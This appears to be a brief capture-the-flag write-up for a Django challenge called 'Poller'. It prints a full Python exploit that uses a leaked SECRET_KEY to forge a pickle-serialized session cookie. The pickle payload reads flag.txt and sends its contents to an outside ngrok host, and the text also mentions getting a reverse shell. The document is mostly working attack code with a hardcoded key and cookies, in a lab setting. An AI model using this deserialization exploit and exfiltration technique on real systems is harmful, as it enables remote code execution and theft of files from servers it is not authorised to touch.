Have your say! Poller is the place where all the important infosec questions are asked.
there is a github link in cource code: https://github.com/congon4tor/poller
from looking at commit we know this is vulnerable to django PickleSerializer RCE and we also found secret_key in previous commits there is also one fake key
we can get the revese shell here but i don't have vps so we go the easy way we know the file name is flag.txt first i created local server with python : python -m http.server 80
and expose it to internet with ngrok : ngrok http 80
now we craft our payload in a way that it will read file content and make a request to our server with that file content in GET request here is final exploit in python :
from django.conf import settings as _settings
from django.core.signing import loads, dumps
from django.contrib.sessions.serializers import PickleSerializer
from urllib.request import urlopen
import os
from sys import argv
class Rce():
def __reduce__(self):
import requests
return (exec,("import requests;s = 'n=1&s=' + open('flag.txt').read();requests.get(f'https://669d-49-34-53-197.in.ngrok.io/hello?{s}');import time;time.sleep(13)",))
# return exec(f'import time;time.sleep(99)')
SECRET_KEY = '77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!'
salt = 'django.contrib.sessions.backends.signed_cookies'
c_url = 'http://challenge.nahamcon.com:31050/'
cookie = '.eJxNjE0KwjAUhHXhUgRPoZuQ5DWa7MS9Zwj5ebFVaaBpl4IHyDKewytaUaGzGZjvYx6L52v2zb1s8lKboa_1kLDTjS95DiWvJ5s17ortCLb-YtpzJC62fddY8lHIjyZyih5vx7-7mhzUJtUlHwRF9JRKxZgNyqFHIYKUY1dMAefAg6IIaLiVogK2d0h3gJXlAQ04VgbyBgKeP5Q:1nlwXO:fHckutyzxCaT3Hb8w56AHnlhu2_4UmbA7rvjo4tKU7s'
content = loads(cookie, key=SECRET_KEY, serializer=PickleSerializer, salt=salt)
content['testcookie'] = Rce()
cookie = dumps(content, key=SECRET_KEY, serializer=PickleSerializer, salt=salt, compress=True)
import requests
c_cookie = {'csrftoken': 'LUQMdTVnStctjS2xxyX8wGl9CfUHyPiROjEjjlsVFgd0a3MhpJg9XCEAIxTJupw4', 'sessionid': cookie}
r = requests.get(c_url, cookies=c_cookie)